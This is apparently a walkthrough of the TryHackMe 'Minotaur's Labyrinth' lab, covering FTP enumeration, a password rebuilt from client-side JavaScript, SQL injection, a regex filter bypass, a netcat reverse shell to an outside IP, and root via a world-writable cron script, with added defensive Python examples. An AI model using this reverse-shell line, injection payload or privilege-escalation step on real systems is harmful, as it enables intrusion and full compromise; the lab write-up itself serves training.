TryHackMe-Minotaur’s Labyrinth

Hello everyone, I hope you are doing well. In this post I will be sharing my walkthrough for the THM Minotaur room. It was rated medium difficulty, but it felt more like an easy room. The machine had 3 ports open: FTP, HTTP(S) and MySQL. FTP allows anonymous login, so we can browse its directories, but we don't find much other than a flag and some user names. On HTTP we find a login page but no credentials; looking into a JavaScript file we find a function that generates a password, so we can reproduce it to get the password and log in to the dashboard. There we find a search field for either Persons or Creatures; this field is vulnerable to SQL injection, through which we find the admin's credentials and reach a secret page that lets us perform remote code execution. In the root directory / there is timer.sh, which is writable by anyone and is run automatically every minute, so we can use it to make bash SUID and become root.

NMAP

21/tcp   open  ftp      syn-ack ttl 63 ProFTPD                    
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 nobody nogroup 4096 Jun 15 14:57 pub
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-favicon: Unknown favicon MD5: C4AF3528B196E5954B638C13DDC75F2F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Login
|_Requested resource was login.html
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-favicon: Unknown favicon MD5: BE43D692E85622C2A4B2B588A8F8E2A6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3306/tcp open mysql? syn-ack ttl 63
| fingerprint-strings:
| NULL:
|_ Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint

PORT 21 (FTP)

Since anonymous login is enabled, we can log in to FTP without a password.

We can see a directory named pub, and inside that folder we'll see another hidden folder and a text file.

From .secret we'll get two more text files

The message that those two files give us is

PORT 80 (HTTP)

On the webserver we can find a login page

If we check the page source, we can find login.js.

Looking into the JavaScript file, we can see three arrays, a, b and c, whose elements at fixed indexes are concatenated to generate a password. We only need to copy that part of the function and print the concatenated string. Note that this is the password for Daedalus.

# The three arrays copied from login.js
a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
# Same index selection as the JS function; prints Daedalus's password
print(a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8])

After submitting those credentials on the login page, we'll be granted access to the dashboard.

If we scroll down a little, we can see two options: search for a person's name in the People table, or search for a creature's name in the Creatures table. Let's run Burp Suite on this page and try some SQLi.

If we search the name “Daedalus”, it returns this user's id and password.

So let's try the SQLi payload 'or 1=1 --

This gave us all the records from the Persons table. We can also check how many columns the table has, and from there enumerate which version of MySQL it is running.

If we try to order the records by the 4th column (ORDER BY 4), we get an error, meaning the table has only 3 columns.
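As an added example (not code from the original writeup or from the box), the following Python snippet reproduces the Persons search against a constructed in-memory SQLite table with the three columns the writeup infers, and places the string-concatenated query next to a parameterised one so the difference in behaviour on the same payload is visible. The table contents, the column names and the names other than Daedalus are assumptions; only the payload comes from the writeup.

```python
import sqlite3

# Constructed in-memory stand-in for the box's database: three columns, as the
# writeup infers from ORDER BY 4 failing. Names and hash values are sample data,
# not values from the room.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Persons (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO Persons (name, password) VALUES (?, ?)",
    [
        ("Daedalus", "<hash placeholder 1>"),
        ("Theseus", "<hash placeholder 2>"),
        ("Ariadne", "<hash placeholder 3>"),
    ],
)

# The probe used in the writeup.
PAYLOAD = "'or 1=1 --"


def search_person_vulnerable(name):
    """String concatenation: the user's text becomes part of the SQL grammar,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    query = "SELECT id, name, password FROM Persons WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def search_person_safe(name):
    """Parameterised query: the statement is fixed and the value is bound
    separately, so the same input is only ever compared as a string."""
    return conn.execute(
        "SELECT id, name, password FROM Persons WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    for fn in (search_person_vulnerable, search_person_safe):
        print(fn.__name__, "Daedalus ->", len(fn("Daedalus")), "row(s)")
        print(fn.__name__, repr(PAYLOAD), "->", len(fn(PAYLOAD)), "row(s)")
```

Against the vulnerable function the payload returns every row, exactly what the writeup observed; against the parameterised one it returns nothing, because no person is literally named `'or 1=1 --`.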

We can crack the user's password hash on the CrackStation website.

On logging in as the M!n0taur user, we can see another tab in the navigation bar.

Foothold

On this page we can echo text, but if we try to break out of the command to run bash commands we can't, as the input is filtered with this regex (seen from the hint):

/[#!@%^&*()$_=\[\]\';,{}:>?~\\\\]/

This regex doesn't include |, so we can echo id and pipe its result to bash.
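To make the filter's weakness concrete from a defender's side, here is an added Python example (not echo.php itself and not code from the room): it applies the denylist regex quoted above, compares it with a constructed allowlist, and shows how passing the text to echo as a separate argv element removes the need for character filtering altogether. The allowlist pattern and the function names are assumptions.

```python
import re
import subprocess

# The denylist regex quoted in the writeup (from echo.php on the box),
# translated from PHP /.../ syntax into a Python pattern.
DENYLIST = re.compile(r"[#!@%^&*()$_=\[\]';,{}:>?~\\]")

# Constructed allowlist (assumption): letters, digits, space and a few
# punctuation marks. Anything else is rejected rather than enumerated.
ALLOWLIST = re.compile(r"[A-Za-z0-9 .,-]*")


def denylist_rejects(text):
    """True when the box's filter would block this input."""
    return DENYLIST.search(text) is not None


def allowlist_accepts(text):
    """True when the input consists solely of allowlisted characters."""
    return ALLOWLIST.fullmatch(text) is not None


def safe_echo(text):
    """Echo user text without ever handing it to a shell: the text is one
    argv element, so shell metacharacters carry no meaning here."""
    if not allowlist_accepts(text):
        raise ValueError("input contains characters outside the allowlist")
    result = subprocess.run(["echo", text], capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


def compare(inputs):
    """Verdicts per input: (input, denylist blocks it, allowlist allows it)."""
    return [(s, denylist_rejects(s), allowlist_accepts(s)) for s in inputs]


if __name__ == "__main__":
    for s, blocked, allowed in compare(["Hello, Minotaur", "hello;id", "hello|id"]):
        print(f"{s!r:18} denylist blocks={blocked!s:5} allowlist allows={allowed}")
```

The denylist catches `;` but not `|`, as the writeup found; the allowlist rejects both because neither character is in it. The more robust fix is the last function: when the program never builds a shell command string from user input, there is nothing to break out of.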

We can check whether netcat (nc) is available on this machine.

To get a reverse shell, we need to base64-encode the netcat payload, because it contains special characters that the filter blocks. So first we convert it to base64:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.94.60 2222 >/tmp/f

Then we send it by piping it to base64 decode and then to bash.

Stabilizing the shell

We can check the echo.php file just to understand what was happening in the background.

We can also find database credentials in dbconnect.php.

In user directory we can get our user flag

Privilege Escalation (root)

We can find a directory named timer in the root directory /, containing timer.sh:

#!/bin/bash
echo "dont fo...forge...ttt" >> /reminders/dontforget.txt

Everyone can read, write and execute this bash script, so we can add an id command that saves its output to a file; once the script is run again, we'll see the result of our command.

Now we can make bash SUID, so that when we execute bash it runs as root and we get a shell as the root user.
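From the defender's side, the fix is that nothing run by root from cron should be writable by other users. The following added Python audit (not code from the room) parses a constructed system-style crontab, resolves each scheduled command and reports scripts that are world-writable or live in a world-writable directory; it stages a copy of /timer/timer.sh with mode 777 in a temporary tree to demonstrate. The crontab line, the staged tree and the function names are assumptions; the writeup only states that the script runs every minute.

```python
import os
import stat
import tempfile

# Constructed sample /etc/crontab content (assumption: the writeup only says
# timer.sh runs every minute; this exact line is not from the room).
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root /timer/timer.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""


def cron_commands(crontab_text):
    """Yield (schedule, user, command) from a system crontab (6 fields + user)."""
    out = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0]:            # environment assignment such as SHELL=...
            continue
        if fields[0].startswith("@"):   # @reboot, @hourly, ...
            sched, user, cmd = fields[0], fields[1], " ".join(fields[2:])
        else:
            sched, user, cmd = " ".join(fields[:5]), fields[5], " ".join(fields[6:])
        out.append((sched, user, cmd))
    return out


def script_path(command):
    """First token of the command if it is an absolute path, else None."""
    tokens = command.split()
    return tokens[0] if tokens and tokens[0].startswith("/") else None


def world_writable(path):
    """True when the 'other' write bit is set on the file or directory."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def risky_cron_scripts(crontab_text, root="/"):
    """Scheduled scripts that are world-writable or sit in a world-writable
    directory. `root` lets the check run against a staged tree for testing."""
    findings = []
    for _sched, user, cmd in cron_commands(crontab_text):
        path = script_path(cmd)
        if path is None:
            continue
        real = os.path.join(root, path.lstrip("/"))
        if not os.path.exists(real):
            continue
        reasons = []
        if world_writable(real):
            reasons.append("file is world-writable")
        if world_writable(os.path.dirname(real)):
            reasons.append("parent directory is world-writable")
        if reasons:
            findings.append((path, user, reasons))
    return findings


def remove_world_write(path):
    """Hardening step: clear group and other write bits on the script."""
    os.chmod(path, os.stat(path).st_mode & ~0o022)


def stage_demo_tree():
    """Build a temp tree mimicking the box: <tmp>/timer/timer.sh with mode 777.
    Returns (root, script_path)."""
    root = tempfile.mkdtemp()
    tdir = os.path.join(root, "timer")
    os.mkdir(tdir)
    os.chmod(tdir, 0o755)
    script = os.path.join(tdir, "timer.sh")
    with open(script, "w") as fh:
        fh.write('#!/bin/bash\necho "dont fo...forge...ttt" >> /reminders/dontforget.txt\n')
    os.chmod(script, 0o777)
    return root, script


if __name__ == "__main__":
    demo_root, demo_script = stage_demo_tree()
    print("before:", risky_cron_scripts(SAMPLE_CRONTAB, root=demo_root))
    remove_world_write(demo_script)
    print("after: ", risky_cron_scripts(SAMPLE_CRONTAB, root=demo_root))
```

Run against the real filesystem with `root="/"`, the same function turns the writeup's finding into a routine check; the run-parts line is skipped on purpose because its command starts with `cd`, not an absolute script path, which is a limit of this simple parser worth knowing about.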

Pentester | CTF Player